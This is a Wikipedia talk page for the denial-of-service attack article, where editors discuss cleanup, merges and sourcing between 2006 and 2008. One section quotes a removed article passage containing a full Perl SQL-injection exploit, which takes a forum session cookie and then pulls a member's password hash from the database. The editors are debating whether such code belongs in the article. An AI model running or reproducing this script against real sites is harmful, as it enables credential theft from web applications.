Talk:Denial-of-service attack

From Wikipedia, the free encyclopedia

Contents

[edit] Image DoSed

Interestingly, the image portraining DoS is DoSed. Ironic and very frustrating. At least IE and FF can't make it work, dunno about opera. 6/4/08 —Preceding unsigned comment added by 77.126.65.64 (talk) 08:46, 4 June 2008 (UTC)

[edit] Protected on 2006 April 18

Reason: Vulgarisms or nonsense was continuously added from different IPs to the article, or large portions removed. --Boborok 07:43, 18 April 2006 (UTC)

[edit] Cleanup

Bleh, I'm just going to start cleaning up this article starting at the top. It's going to be rough at first because I'm going to be more concentrated on changing the overall layout. Does anyone have any objections to removing the stuff that reads like an ad? Otherwise I'll do away with it and just pick out key points to be integrated into other sections. fintler 15:45, 23 June 2006 (UTC)

[edit] Rewrote DDoS bit

Added some references I was bored.

Removed some of the stuff in the prevention and response section it was just leading up to the advertising that has previously been removed. Some of it was broad generalisations with no references backing it up some of it was factually wrong, This article needs some attention ;-)

It would be interesting to hear from the original author of the prevention and response section.

218.145.101.210 deleted most of the prevention bit so I reverted to revert by Omicronpersei8. 60.240.174.85 12:28, 24 July 2006 (UTC)

[edit] Discussion Points

I'm merging all of the old discussion (some going back to 2003-2004) and putting the points here so they can be discussed easier:

  1. Perhaps some mention should be given to the architecture of the internet responsible for unwanted outcomes by too-many-requests to begin with. other network protocols exist which benefit rather than degrade with increased scaling of requests. Freenet is one example.
  2. The similarity with slashdotting.
  3. "A final option, one which might be available to larger companies and networks, is to throw more hardware or bandwidth at the flood and wait it out."
  4. "A distributed reflector denial of service is an internet attack of a type first detected in 2005 ..." What? You are about 4 years late. Check that and correct it please.
  5. Mention of operating system/kernel-level defences
  6. Removing the ad-like content towards the bottom along with related ads —Preceding unsigned comment added by Fintler (talkcontribs)

[edit] New category 'Computer Network Security'

I propose to create a new category 'Computer Network Security' assign the same to this article along with many other related articles. Raanoo 06:51, 31 July 2006 (UTC)

There is already such a category, Category:Computer network security. This article's category, Category:Denial-of-service attacks, is in that category. It is a good idea for someone to go through the related article list as suggested to ensure that any articles that properly belong in this category or one of its subs are placed there. JonHarder 13:28, 31 July 2006 (UTC)
I think that much of what is on the DOS category could be moved into the DOS article. That will give the article a better chance of reaching featured status. It will also get rid of the problem described above since the only sub-articles that would survive are those that are large enough to be left alone. Thus, most of the stuff on the DOS category could be moved, once this is done, into the Computer Network Security cat. I will slowly work on it. Brusegadi 06:07, 28 August 2007 (UTC)

[edit] DDos section innacuracies

A quick read of this article, and I can already see that it needs a lot of help. I will rewrite the next section to be a) correct b) readable.

A distributed denial of service attack (DDoS) occurs when multiple compromised systems flood the bandwidth or resources of a targeted system usually a web server(s). These systems are compromised by attackers using a variety of methods.

A few notes on this:

  1. "...when multiple compromised systems..." - The systems do not have to be compromised. DDos attacks are just as commonly from groups of willing users who don't realise they aren't anonymous. (ie script kiddies)
  2. "...usually a web server(s)..." - DDoS attacks affect clients just as (if not more) often than webservers. (see IRC_floods) This is the a big reason why some like to use Tor, to hide their IP from being DDoSed.
  3. Webserver DDoSes may actually be the Slashdot effect, but misdiagnosed. Client DDoSes are more of an IRC thing, but remember that the internet is not just WWW.
  4. Would we consider a crapflood a DDoS?

Happy editing to all. Michael Billington (talkcontribs) 11:28, 6 August 2006 (UTC)

[edit] injection is DoS?

Should the === MySQL injection === section be in this article? although sql injection can cause a DoS condition, it is not a DoS attack in itself is it? If it is considered a DoS attack, should the code be a little bit more illustrative? it simply displays a general sql injection, not an sql injection that causes a DoS condition.

Overall i feel the section with sourcecode is confusing.

fv. —The preceding unsigned comment was added by Fedevela (talkcontribs) 17:24, 15 August 2006 (UTC).

It's OK by me to remove the section. The code portion isn't appropriate for an article. See WP:NOT an instruction manual. JonHarder 17:33, 15 August 2006 (UTC)

I will see if instead of completely removing the entry, I draft a DoS attack through an SQL injection. Will post it as soon as it is presentable. I'm excited on my first wikipedia contribution!!! Thanks for your reply Jon. Fedevela 20:09, 15 August 2006 (UTC)

Sounds good & welcome Wikipedia! JonHarder 20:35, 15 August 2006 (UTC)


Putting the old section here for now.

[edit] MySQL injection

MySQL is a free databasing language and program used in most forums to organize various rows and manage the site's sub-server. A MySQL Injection is a malformed MySQL code that affects the targeted database in varying ways. Due to safety reasons, the method of applying a MySQL Injection will be withheld. A written example of an injection is as follows:


#!perl
#Greetz or begining message of the 404 would go here.
use IO::Socket;
$host = $ARGV[0];
$path = $ARGV[1];
$topic = $ARGV[2];
$id = $ARGV[3];
if (@ARGV < 4) {
 print "---------------------------------------------------------\n";
 print "-- This is a MySQL Injection --\n";
 print "-- Coded by Some Hacker --\n";
 print "-- I am a n00b Hacker --\n";
 print "-- Usage: $0 [host] [path] [topic] [id] --\n";
 print "-- Ex: $0 127.0.0.1 cws 2 2 --\n";
 print "---------------------------------------------------------\n";
 exit();
}
$sock = IO::Socket::INET->new(PeerAddr => "$host",PeerPort => "80",Proto => "tcp") || die "Can't establish a     connection\n";
print $sock "GET /$path/index.php?page=forum&func=post&par=$topic HTTP/1.1\n";
print $sock "User-Agent: Mozilla/4.0\n";
print $sock "Host: $host\n\n";
while ($asd = <$sock>) {
        if ($asd =~ /Set-Cookie:/gi) {
            $asd =~ /cuser_id=([a-zA-Z0-9]{32})/;
            $cookie = $1;
        }
}
$sock->close;
$socket = IO::Socket::INET->new(PeerAddr => "$host",PeerPort => "80",Proto => "tcp") || die "Can't establish a  connection\n";
print "-- Connection Established --\n";
print $socket "GET   /$path/index.php?page=forum&func=post&par=$topic%20UNION%20SELECT%20null,null,null,null,null,null,password,null%20FROM%20cws_members%20WHERE%20member_id=$id/*  HTTP/1.0\n";
print $socket "User-Agent: Mozilla/4.0\n";
print $socket "Host: $host\n";
print $socket "Cookie: cuser_id=$cookie; chitcounter=hitcounter\n\n";
print "-- Waiting... --\n";
while($ans = <$socket>) {
       if ($ans =~ /([a-zA-Z0-9]{32})/){
            if ($ans =~ /cookie/i) {
                 next;
            }
            print "\nmember id: $id \n";
            print "md5 hash: $1 \n";
            exit;
       }
}

Coded By: Derek H.

Fedevela 11:26, 16 August 2006 (UTC)


OK! finished editing that section ... i have not tested the code, and i am not positive you can insert EL expressions in the SQL tag like i'm doing. Nevertheless I think this sample illustrates the relationship between DoS and SQLInjection. Please let me know what you think! Fedevela 14:30, 16 August 2006 (UTC)

[edit] Should there be code offered here?

Given the extremely slow performance of Wikipedia navigation and page refreshes at certain times (earlier this afternoon, for example) while other sites respond normally, my non-technical suspicious mind wonders if there's a denial of service attack going on. I don't have the background to understand the code posted above, but based on the comments surrounding it I have to wonder if it's a good idea to allow such code examples anywhere at Wikipedia. --CliffC 21:24, 9 October 2006 (UTC)

[edit] *smirks*

The person who hacked the box is NOT eligible, nor are members of the Honeynet Project. Members of the Honeynet Research Alliance or companies employing Honeynet Project members are eligible (and encouraged!) to enter, but their entries (even if Top 20) will not receive copies of Know Your Enemy. The books go to other entrants.

From the Honeywell Project page. No particular relevance to this article; just thought it was amusing. :p --Veratien 01:03, 2 December 2006 (UTC)

[edit] Client Puzzle Protocol

- has been proposed as a solution to DoS. Maybe we should mention this? —The preceding unsigned comment was added by Cdamama (talkcontribs) 03:05, 13 December 2006 (UTC).

looks completely useless to me. Most DoS attacks do not require a complete connection to be made so any sort of "puzzle protocol" can't even be started. Wrs1864 03:11, 13 December 2006 (UTC)

[edit] Effects

If the DoS is conducted on a sufficiently large scale, entire geographical swathes of Internet connectivity can also be compromised by incorrectly configured or flimsy network infrastructure equipment without the attacker's knowledge or intent. For this reason, most, if not all, ISPs ban the practice.

No. "Accidentally breaking the internet" is not why ISPs ban DoS attacks. ISPs ban DoS attacks because they intentionally break the internet. (See TOS §3.1.1 Breaking the Internets)

Removed second sentence. —Ryan 06:54, 6 March 2007 (UTC)

[edit] Removed make technical articles accessible tag

The {{technical}} tag was added June 23 of 2006, but I'm not entirely clear on why, or that it remains applicable. I've gone ahead and removed it.

If anyone believes it still applies, feel free to re-add it — but please provide a specific explanation of why it's necessary, as per these standards: "You should put an explanation on the talk page with comments on why you believe it is too technical, or suggestions for improvement. Templates added without explanation are likely to be either ignored or removed." livefastdieold 00:41, 15 April 2007 (UTC)

[edit] Cleaned up links

I cleaned up the links as there were mulitbles of the same site and un-needed links that were borderline spam. Warrush

[edit] Merge from Nuke

I think the merge is good. I will do it if the editors who are most involved with this page think it is not a problem. I think merging them will give this article a boost towards featured status. Brusegadi 00:23, 26 August 2007 (UTC)

Done! Brusegadi 05:52, 28 August 2007 (UTC)

[edit] Merge from Teardrop

The source is so small that, at least for now, it makes sense to merge. I will proceed as I did with the merge for nuke. Brusegadi 06:54, 29 August 2007 (UTC)

Done. Brusegadi 05:09, 31 August 2007 (UTC)

[edit] Intentions?

What do we think about this statement?

Although most DDoS attacks are malicious in nature, the same technique can be used to aid the Internet community. --Leus 21:07, 4 September 2007 (UTC)

Should be removed. I will go through the entire article and look for proper sources and remove such statements. Thanks for the note. Brusegadi 04:26, 5 September 2007 (UTC)

[edit] Fair use rationale for Image:Yahelitescrnscap.JPG

Image:Yahelitescrnscap.JPG is being used on this article. I notice the image page specifies that the image is being used under fair use but there is no explanation or rationale as to why its use in this Wikipedia article constitutes fair use. In addition to the boilerplate fair use template, you must also write out on the image description page a specific explanation or rationale for why using this image in each article is consistent with fair use.

Please go to the image description page and edit it to include a fair use rationale. Using one of the templates at Wikipedia:Fair use rationale guideline is an easy way to insure that your image is in compliance with Wikipedia policy, but remember that you must complete the template. Do not simply insert a blank template on an image page.

If there is other fair use media, consider checking that you have specified the fair use rationale on the other images used on this page. Note that any fair use images uploaded after 4 May, 2006, and lacking such an explanation will be deleted one week after they have been uploaded, as described on criteria for speedy deletion. If you have any questions please ask them at the Media copyright questions page. Thank you.

BetacommandBot 18:31, 13 September 2007 (UTC)

[edit] Merge with Meow wars

Someone tagged Meow wars to merge here. Discuss.

  • Support. It has no evidence of notability or much in the way of reliable sources itself, so does not rate a whole article, but there's enough to it to be worth a mention in the topic it applies to. Dicklyon 16:07, 23 September 2007 (UTC)
  • Go for it. Just name the subsection 'Meow wars' or something and then only transfer a shortened version of everything. Note that if you move the entire thing the article is going to get too big. Brusegadi 16:40, 23 September 2007 (UTC)
  • Oppose (I think). Meow wars seems closer to a social phenomenon than a denial of service (are we next going to add Wikipedia vandalism, spam (electronic), and any number of random flame wars and people trying to annoy each other on the net?). The meow wars article could use some work, but I'd probably sooner merge it to Usenet than to here. Or keep it as its own article; it was kind of a big deal within the world of usenet even if it seems obscure in a wider context (establishing WP:N is kind of a can of worms for many online phenomena, but that's an issue whether it is its own article or just a section in another article). Kingdon 18:06, 16 October 2007 (UTC)
Actually that isn't really true. Notability matters in all cases but there are a lot of things which are noteable enough for a brief mention in another article but not for a seperate article Nil Einne 12:50, 21 October 2007 (UTC)
  • I have to agree with Kingdon. I think that the Meow wars page needs more work before it's merged with anything really. Perhaps you could make reference to the Meow wars being an early/primitive form of DOS attack and link to the article? Where the article stands now, I don't think there's enough solid information and sources cited to back up what's been said. CoyoteWildfire 10:14, 24 October 2007
  • Oppose Meow wars is an interesting article in its own right, but it needs some work. Bitplane 23:37, 17 December 2007 (UTC)
  • Oppose, as people have pointed out they are not quite the same thing as well as merging serves no useful purpose regardless in this instance. Mathmo Talk 00:40, 24 January 2008 (UTC)

[edit] Anonymous vs. Church of Scientology

http://youtube.com/watch?v=YnEqXMMCDEc —Preceding unsigned comment added by 71.128.69.207 (talk) 19:17, 27 January 2008 (UTC)

[edit] Statistics

Just found this on ITPROs news section:

"DOS attacks are also becoming increasingly common. During the first six months of 2006, Symantec observed an average of 6,110 DoS attacks per day."

http://www.itpro.co.uk/security/news/98616/analysis-websites-struggling-for-legal-recourse-for-dos-attacks.html

Anyone think the statistic is worth including? It'll give a better idea of how occurrent the problem has become...

Also, I'm rubbish at editing so if anyone wants to put it in... —Preceding unsigned comment added by 86.149.69.210 (talk) 07:45, 18 March 2008 (UTC)

[edit] Not completely wikified.

I've added some internal links to the section that needs to be wikified, but I don't feel that there are enough for it to be up to Wikipedia's standards. I've also changed the acronym "DDoS" in that section to "DoS" (but in that section only) because, from my understadning, a DDoS attack is just a form of a DoS attack. I didn't remove the Wikify template, though, becasue I felt that it wasn't up to standard. Thanks. Totakeke423 (talk) 10:25, 29 March 2008 (UTC)

[edit] Suggestions

The following suggestions were generated by a semi-automatic javascript program, and might not be applicable for the article in question.

  • There may be an applicable infobox for this article. For example, see Template:Infobox Biography, Template:Infobox School, or Template:Infobox City.[?] (Note that there might not be an applicable infobox; remember that these suggestions are not generated manually)
  • When writing standard abbreviations, the abbreviations should not have a 's' to demark plurality (for example, change kms to km and lbs to lb).
  • There are a few occurrences of weasel words in this article- please observe WP:AWT. Certain phrases should specify exactly who supports, considers, believes, etc., such a view.
    • correctly
    • might be weasel words, and should be provided with proper citations (if they already do, or are not weasel terms, please strike this comment).[?]
  • Watch for redundancies that make the article too wordy instead of being crisp and concise. (You may wish to try Tony1's redundancy exercises.)
    • Vague terms of size often are unnecessary and redundant - “some”, “a variety/number/majority of”, “several”, “a few”, “many”, “any”, and “all”. For example, “All pigs are pink, so we thought of a number of ways to turn them green.”
  • Avoid using contractions like (outside of quotations): doesn't, aren't.
  • Please ensure that the article has gone through a thorough copyediting so that it exemplifies some of Wikipedia's best work. See also User:Tony1/How to satisfy Criterion 1a.[?]

You may wish to browse through User:AndyZ/Suggestions for further ideas. Thanks, CWii(Talk|Contribs) 22:04, 2 May 2008 (UTC)

[edit] political examples

The article is missing info on examples of politically motivated DoSs; see [1] --Espoo (talk) 13:11, 21 May 2008 (UTC)